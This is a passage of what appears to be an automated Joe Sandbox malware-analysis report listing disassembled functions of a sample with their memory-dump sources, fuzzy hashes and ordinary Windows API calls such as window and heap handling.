                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 4cf0ee85a25dfb26b76d9792a060250d0f64c0face536f17b87e81163bb962ed
                                                              • Instruction ID: 7632a2a940c512d76d99994df8fe80166c5543c7902782d2a53b4a0e67415fb6
                                                              • Opcode Fuzzy Hash: 4cf0ee85a25dfb26b76d9792a060250d0f64c0face536f17b87e81163bb962ed
                                                              • Instruction Fuzzy Hash: BFC14772A183458FC354CF29D88065AFBE1BFC8608F19892EE998D7312D734E954CB96
                                                              Function 0043F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0043F3A5), ref: 0043F9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 91e27d3fc368c1b2ce0bdaaa99472d0a1ad4b1574b726db0ff9c4fffdb378cb7
                                                              • Instruction ID: 1bf81529fdf1381e1363c8001fc8f4c00d529c6339134ebe3657d927ecdb5190
                                                              • Opcode Fuzzy Hash: 91e27d3fc368c1b2ce0bdaaa99472d0a1ad4b1574b726db0ff9c4fffdb378cb7
                                                              • Instruction Fuzzy Hash:
                                                              Function 0044C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 04dd2f979af27fcd6f1ecb03a1c0336c129c5e5310f2f3d513548671db578ae0
                                                              • Instruction ID: 5a961e4af51d7ffc6dbbd38c5430c9a0604020d0d33c030d8dde6c8151bf2c8b
                                                              • Opcode Fuzzy Hash: 04dd2f979af27fcd6f1ecb03a1c0336c129c5e5310f2f3d513548671db578ae0
                                                              • Instruction Fuzzy Hash: 96A01130A022008B83808F30AF0820C3AA8AA002C2308003AA008C0020EA2080A0AB08
                                                              Function 004362CA Relevance: .8, Instructions: 829COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction ID: 4d6d187c867e5a61a7bf8c890c2d6e57370ad1a6137eff0ab81dd85d78098854
                                                              • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction Fuzzy Hash: 8F623971604785AFCB15CF28C4906BABBE1BF99304F05D96ED8DA8B342D738E905CB19
                                                              Function 004377EF Relevance: .8, Instructions: 817COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction ID: 3183a6eed1f35315acdeb65bebc2adcfbff6955636f0ef52b34849427f85f892
                                                              • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction Fuzzy Hash: 9B620AB160C3458FCB29DF28C4806B9BBE1BF99304F18956EE8D68B346D734E945CB19
                                                              Function 0042F461 Relevance: .7, Instructions: 694COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction ID: c4c3b7f93642e1246f7e444e7ebdea488fafecfa9fd3e9521b43913a04d4c7e9
                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction Fuzzy Hash: AD523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Function 00437153 Relevance: .5, Instructions: 536COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2b7671f8b900b1b82725bdda18d5a1e81dff966c09610587930ae40c3a32a9a
                                                              • Instruction ID: f732fbc854b765352ea40f4aafe342955078ffe0a570dcb0b6d031a1b96e81ac
                                                              • Opcode Fuzzy Hash: e2b7671f8b900b1b82725bdda18d5a1e81dff966c09610587930ae40c3a32a9a
                                                              • Instruction Fuzzy Hash: DC12C3B16087069FC728CF28C59067AB7E0FF99308F14592EE9D6C7781E338A595CB49
                                                              Function 0042C426 Relevance: .5, Instructions: 454COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 388e008a191516bb9861b6b5f0a93c43f0779c986419ad5e19a556d3c9253006
                                                              • Instruction ID: 3199c3f8438e98954568902f496167a09d7c68db63ef1f528bfd2cd3c2d595c7
                                                              • Opcode Fuzzy Hash: 388e008a191516bb9861b6b5f0a93c43f0779c986419ad5e19a556d3c9253006
                                                              • Instruction Fuzzy Hash: F0F1CCB16083218FC714CF29D5C462EBBE1EB8A318F954A2FF48597351D638E949CB4A
                                                              Function 00436CDC Relevance: .3, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: bc2428a6efe0583b0543f740af36f09e2f7c2aade04ed81543b620be1de073cc
                                                              • Instruction ID: 1ec45faad4eaddd45e8c7fb2ffa3727c51a260a005cf25f7dfdf23f4ea64bda3
                                                              • Opcode Fuzzy Hash: bc2428a6efe0583b0543f740af36f09e2f7c2aade04ed81543b620be1de073cc
                                                              • Instruction Fuzzy Hash: C1D1B4B16083419FDB24CF29C84175BBBE1BF8D308F05956EE8859B342D778E909CB5A
                                                              Function 0042E9B7 Relevance: .3, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a1f7f991c97256ed9991911655e252eb36d0fd5b464ac384b4b6cd15d774d4d
                                                              • Instruction ID: 4a965dcbbd4d977473496bbbd4bb35d128cff642f3fc803d35e9028b687babfd
                                                              • Opcode Fuzzy Hash: 5a1f7f991c97256ed9991911655e252eb36d0fd5b464ac384b4b6cd15d774d4d
                                                              • Instruction Fuzzy Hash: 64E16DB55083949FC304CF29D89046BBFF0AF9A300F46096EF9C497352D275EA19DB96
                                                              Function 00434088 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction ID: 8b601639fd442cf659720f6dc676d5a8e0b13c6ed013bc6dcec56e8524f26bd8
                                                              • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction Fuzzy Hash: 169156B03007498BDB24EE64D894BFB77D4EB98308F50192FF99687282DA6CA545C35A
                                                              Function 004343BF Relevance: .2, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction ID: 6158ebe982df9d9bd81f2c58a3a609fe8f36f05a4f682034e12ea695810913a9
                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction Fuzzy Hash: 1B8150717043465BDB24DE55D881BFE37D0ABE9308F00193FEA8687382DA6CA985875E
                                                              Function 004451C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f43a96aeef1b0a9f9f2085f0f20f0115989e46f79c499d3aae08db8f1a97163d
                                                              • Instruction ID: ba821847540a3f662ec3296994ab3c4a662745b6a32f17e16c7035db4376c32b
                                                              • Opcode Fuzzy Hash: f43a96aeef1b0a9f9f2085f0f20f0115989e46f79c499d3aae08db8f1a97163d
                                                              • Instruction Fuzzy Hash: 66612571600F0867FE389A6868957BF6394FB41744F140A5FE882DF383D6DD9D428A1E
                                                              Function 00444F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction ID: 89aa30462c00a24ce65e671d778ad2031e047bfe415940eb925f5297b540b26c
                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction Fuzzy Hash: EA513965600F4857FF3495688556BBF27D59B52304F28081FE982CB783C51DEE4AC3AE
                                                              Function 0042EFE2 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b11cd2d9fe1a166473cef4280757205ca82e93617e36304a25ee1e85b0f90ba
                                                              • Instruction ID: 1307545d623860716e0943fe85430235cb8c756ef7aecf68c45a988d500f8aae
                                                              • Opcode Fuzzy Hash: 9b11cd2d9fe1a166473cef4280757205ca82e93617e36304a25ee1e85b0f90ba
                                                              • Instruction Fuzzy Hash: 5E51D3316083A58AD701CF25D14046EBFF0AE9A718FC909BEE5D95B243C224DB4ECB66
                                                              Function 004300B7 Relevance: .1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8444257518c3ca9b8d5d723b8387872298070798df9fe93beb12ce606cff45af
                                                              • Instruction ID: 2541c954292ef5114bcb8d00de2f2b5a632e976be57497e21c0360a71823a413
                                                              • Opcode Fuzzy Hash: 8444257518c3ca9b8d5d723b8387872298070798df9fe93beb12ce606cff45af
                                                              • Instruction Fuzzy Hash: AB51EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3300D734EA59CB9A
                                                              Function 00433E0B Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction ID: 749e9fd5d43645bafbc1f20767c5a73a70f73bb2d5d56faa1d1cc4f5c370dca3
                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction Fuzzy Hash: 1F3128B1B047168FCB14EF29C85126EBBE0FB99315F50452EE885C7341C738EA0ACB96
                                                              Function 0042E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0042E30E
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                                • Part of subcall function 00431DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00461030,00000200,0042D928,00000000,?,00000050,00461030), ref: 00431DC4
                                                              • _strlen.LIBCMT ref: 0042E32F
                                                              • SetDlgItemTextW.USER32(?,0045E274,?), ref: 0042E38F
                                                              • GetWindowRect.USER32(?,?), ref: 0042E3C9
                                                              • GetClientRect.USER32(?,?), ref: 0042E3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0042E475
                                                              • GetWindowRect.USER32(?,?), ref: 0042E4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 0042E4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 0042E4E3
                                                              • GetWindow.USER32(?,00000005), ref: 0042E4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0042E51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 0042E58D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d$tE
                                                              • API String ID: 2407758923-3367939056
                                                              • Opcode ID: ff5e3dcd61c0d9b59f02e4adb6547d241a0f6df8a765fa601c5ede547572d9d6
                                                              • Instruction ID: 93f0cdc5266c584662ec75b6fe964e5fb76683ddd69fadd6ef957d73cc44af58
                                                              • Opcode Fuzzy Hash: ff5e3dcd61c0d9b59f02e4adb6547d241a0f6df8a765fa601c5ede547572d9d6
                                                              • Instruction Fuzzy Hash: EC81D471204311AFD710DFA9DC88A6FBBE9EBC8B05F04092EFA84D3251D734E9058B56
